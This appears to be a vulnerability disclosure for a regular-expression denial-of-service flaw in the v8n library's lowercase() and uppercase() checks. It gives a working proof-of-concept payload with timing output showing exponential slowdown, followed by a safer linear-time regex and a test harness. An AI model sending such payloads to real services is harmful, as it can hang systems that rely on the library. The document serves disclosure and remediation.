Inefficient regular expression complexity in the lowercase() and uppercase() regexes could lead to a denial of service attack. With a crafted payload 'a' + 'a'.repeat(i) + 'A', a payload of only 32 characters took 29443 ms to execute when testing lowercase(). The same issue happens with uppercase().
```js
// PoC.js
const v8n = require('v8n');

// Grow the payload one character per iteration and time each lowercase() check.
for (let i = 1; i <= 1000; i++) {
  const time = Date.now();
  // A run of lowercase letters followed by a single uppercase letter, so the
  // match fails only after the regex has tried every way of splitting the run.
  const attack_str = 'a' + 'a'.repeat(i) + 'A';
  v8n().lowercase().test(attack_str);
  const time_cost = Date.now() - time;
  console.log('attack_str.length: ' + attack_str.length + ': ' + time_cost + ' ms');
}
```

Output:

```
attack_str.length: 26: 434 ms
attack_str.length: 27: 868 ms
attack_str.length: 28: 1876 ms
attack_str.length: 29: 3641 ms
attack_str.length: 30: 7899 ms
attack_str.length: 31: 14900 ms
attack_str.length: 32: 29443 ms
```
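The timings above roughly double with each added character, which is the signature of a pattern whose engine can split one run of letters into iterations in exponentially many ways. The following is an added example, not v8n's own code: a linear-time check for the same kind of input, written so that the letter class and the whitespace class never overlap and no quantified group can match the empty string, plus a timing harness that feeds it the report's payload shape. The accepted grammar (words of one case separated or followed by whitespace) is an assumption made here, not something the report states.

```javascript
// Added example (not v8n's code): backtracking-safe replacements for the
// lowercase()/uppercase() checks, plus a timing harness using the report's
// 'a' + 'a'.repeat(i) + 'A' payload shape.
//
// Assumption (not stated on the page): the rule accepts one or more words of
// letters in the given case, separated or followed by whitespace. Each
// repetition of the inner group must consume at least one whitespace and one
// letter, and the two classes are disjoint, so for any prefix there is only
// one way to match it and the engine cannot backtrack exponentially.
const SAFE_LOWERCASE = /^[a-z]+(?:\s+[a-z]+)*\s*$/;
const SAFE_UPPERCASE = /^[A-Z]+(?:\s+[A-Z]+)*\s*$/;

function isLowercase(str) {
  return typeof str === 'string' && SAFE_LOWERCASE.test(str);
}

function isUppercase(str) {
  return typeof str === 'string' && SAFE_UPPERCASE.test(str);
}

// Builds the report's payload shape: i+1 lowercase letters followed by one
// uppercase letter, so the whole match has to fail at the very end.
function buildPayload(i) {
  return 'a' + 'a'.repeat(i) + 'A';
}

// Returns the wall-clock cost in milliseconds of a single check on `input`.
function timeCheck(check, input) {
  const start = Date.now();
  check(input);
  return Date.now() - start;
}

// Stand-alone run: the PoC's 32-character payload and two far longer ones.
// With the safe pattern each of these completes in a few milliseconds at most.
function demo() {
  const results = [];
  for (const i of [30, 1000, 100000]) {
    const payload = buildPayload(i);
    const ms = timeCheck(isLowercase, payload);
    results.push({ length: payload.length, ms });
    console.log('payload length ' + payload.length + ': ' + ms + ' ms');
  }
  return results;
}

demo();
```

The same payload that took 29443 ms against the vulnerable pattern at 32 characters is rejected immediately here, and the 100001-character variant still finishes in the same order of magnitude, which is the behaviour to confirm when reviewing a replacement pattern.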